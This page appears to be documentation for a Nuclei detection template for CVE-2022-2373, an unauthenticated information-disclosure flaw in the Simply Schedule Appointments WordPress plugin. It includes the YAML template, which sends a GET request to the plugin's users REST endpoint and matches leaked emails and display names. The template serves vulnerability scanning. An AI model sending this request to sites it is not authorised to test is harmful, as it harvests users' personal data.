WordPress Simply Schedule Appointments <1.5.7.7 - Information Disclosure
ID: CVE-2022-2373
Severity: medium
Author: theamanrawat,theabhinavgaur
Tags: cve,cve2022,simply-schedule-appointments,unauth,wpscan,wordpress,wp-plugin,wp,nsqua
Description
Section titled “Description”WordPress Simply Schedule Appointments plugin before 1.5.7.7 is susceptible to information disclosure. The plugin is missing authorization in a REST endpoint, which can allow an attacker to retrieve user details such as name and email address.
YAML Source
Section titled “YAML Source”id: CVE-2022-2373
info: name: WordPress Simply Schedule Appointments <1.5.7.7 - Information Disclosure author: theamanrawat,theabhinavgaur severity: medium description: | WordPress Simply Schedule Appointments plugin before 1.5.7.7 is susceptible to information disclosure. The plugin is missing authorization in a REST endpoint, which can allow an attacker to retrieve user details such as name and email address. impact: | An attacker can exploit this vulnerability to gain sensitive information from the target system. remediation: | Update to the latest version of the Simply Schedule Appointments plugin (1.5.7.7 or higher) to fix the information disclosure vulnerability. reference: - https://wpscan.com/vulnerability/6aa9aa0d-b447-4584-a07e-b8a0d1b83a31 - https://wordpress.org/plugins/simply-schedule-appointments/ - https://nvd.nist.gov/vuln/detail/CVE-2022-2373 - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-2373 cwe-id: CWE-862 epss-score: 0.00292 epss-percentile: 0.68538 cpe: cpe:2.3:a:nsqua:simply_schedule_appointments:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: nsqua product: simply_schedule_appointments framework: wordpress tags: cve,cve2022,simply-schedule-appointments,unauth,wpscan,wordpress,wp-plugin,wp,nsqua
http: - method: GET path: - "{{BaseURL}}/wp-json/ssa/v1/users"
matchers-condition: and matchers: - type: word part: header words: - application/json
- type: regex regex: - 'response_code":200' - '"email":"([a-zA-Z-_0-9@.]+)","display_name":"([a-zA-Z-_0-9@.]+)","gravatar_url":"http?:\\\/\\\/([a-z0-9A-Z.\\\/?=&@_-]+)"' condition: and
- type: status status: - 200# digest: 4a0a0047304502201152b7b5acb2724645a27731bc4ed4d2ec2d7f56971c508c086c5436b1071699022100ad30a2544420b390950c2b2a3d191caa4391634818b64616ef8d5c3b4c04b2a0:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-2373.yaml"